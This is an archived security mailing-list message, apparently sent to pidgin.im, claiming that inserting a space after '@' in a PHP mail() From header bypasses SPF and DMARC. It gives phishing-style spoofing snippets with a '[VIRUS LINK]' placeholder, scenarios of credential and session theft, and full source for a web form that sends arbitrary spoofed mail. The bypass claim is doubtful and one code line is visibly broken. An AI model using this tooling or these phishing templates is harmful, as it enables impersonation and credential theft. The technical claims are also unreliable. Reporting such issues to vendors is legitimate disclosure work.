Email Server Exploit, I can bypass ALL email protection from your side even DMARC and SPF records

ashesh1708 at gmail.com ashesh1708 at gmail.com
Wed Jun 17 10:11:13 EDT 2015 

<html>
<body>
    
    <h3>I can use @pidgin.im TO spoof messages
[SPF RECORD BYPASS]</h3><pre>I see that your
mail-server is protected is anti-spoof but i found
a way to bypass this and send an email from
`support at pidgin.im`, `admin at pidgin.im`,
`ANYTHING at pidgin.im` to anyone.  A POC is attched.

Here's the PHP code I use to achieve this:

______________________________________________________________________________
**THIS WILL NOT WORK**
--------------------------------

    <?php
    $to = "victim at example.com";
    $subject = "Change Your password";
    $txt = "Due to recent Heartbleed attack , We
request you to change your password [VIRUS LINK]
";
    $headers = "From: support at pidgin.im";
    mail($to,$subject,$txt,$headers);
    ?>

______________________________________________________________________________
**THIS WILL WORK**
--------------------------------

    <?php
    $to = "victim at example.com";
    $subject = "Change Your password";
    $txt = "Due to recent Heartbleed attack , We
request you to change your password [VIRUS LINK]
";
    $headers = "From: support@ pidgin.im";        
// This line is edited
    mail($to,$subject,$txt,$headers);
    ?>
______________________________________________________________________________
**EXPLOIT SCENARIO**
-----------------------------------
Using this I can send Spoofed email to victim
telling to change his/her password.Even if  he/she
sees that the mail originated from
`support at pidgin.im` , He has no other way than to
believe it. Clicking on the link takes him to a
website where certain JavaScript is executed or
anything more dangerous!






If I send a mail from attacker at pidgin.im OR from
attacker@ pidgin.im they both are considered same
by email providers.
Using this I can send Spoofed email to victim
telling to change his/her password. Then I use the
appropriate PHP codes I mentioned above. It
appears to be same when received.

1) Phishing
2) Change Password
3)Make Fake Transition
4) Click on Virus link
5) Removes the trust of user on the website
etc.

Scenario 1:

Jim meets jack physically and decides an deal. An
attacker somehow know this, He want the deal to be
cancelled. he sends a spoofed mail from
admin at xyz.com to jim at pidgin.im telling that deal
is cancelled for some reason.

Scenario 2:

One day jim opens his email and sees an email from
security at pidgin.im regarding changing password. He
doubts that pidgin.im is real Company or not? Then
he opens pidgin.im in his web browser which
redirects him to ORIGINAL pidgin.im , It confirms
that pidgin.im is Original!!!

(Big companies own all domains eg.
http:/google.com, http:/google.co.in,
http:/google.co.uk all is owned by google same is
the case with Yahoo!) 
He clicks that change password link, clicking on
the link takes him to a website where certain
JavaScript is executed which steals his pidgin.im
id and password (SESSION). The results can be more
dangerous.

Proof OF Concept

Two images are attached. Each of one shows use of
the codes , I mentioned above.

I have made a website (http://cdata.comule.com) to
send the spoofed mail combining the two codes.
(Please don't send more than 18 mails per minute
and wait 5 minutes for mail to arrive)

The source code of my website is :

a) index.php

<html>
<body>
<h3>If using SMPT Protection use
(username@[SPACE]example.com) in "From"
field eg. (world123@ facebook.com)</h3>
<form action="submit.php"
method="post">
 To: <input type="text"
name="to"><br> 
 From: <input type="text"
name="from"><br>
 Subject: <input type="text"
name="subject"><br>
 Message: <textarea
name="message"></textarea><br>
  <input type="submit">
</form>
</body>
</html>



b) submit.php

<?php
$to = $_POST["to"];
$subject = $_POST["subject"];
$txt = $_POST["message"];
$headers = "From:
".$_POST["from"];     
if(mail($to,$subject,$txt,$headers)){
echo "SENT";
echo "<br>";
echo "TO: ".$_POST["to"];
echo "<br>";
echo "From: ".$_POST[
echo "<br>";
echo "Subject:
".$_POST["subject"];
echo "<br>";
echo "Content:
".$_POST["message"];
echo "<br>";
}else{
echo "Fail";
}
?>

I made a Proof of Concept video about how this can
be exploited in Yahoo! Mail
(https://www.dropbox.com/s/ir8dprnetk322n8/POC.mp4)
Same applies to you.


POC:
http://ultraimg.com/images/9b33ed231761.png</pre><br/>DATE:
   17/06/2015<br/>HOUR:     02:11:13 pm<br/>IP:   
   127.6.47.129<br/><br/>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://pidgin.im/cgi-bin/mailman/private/security/attachments/20150617/8ec2185e/attachment-0001.html>

More information about the security mailing list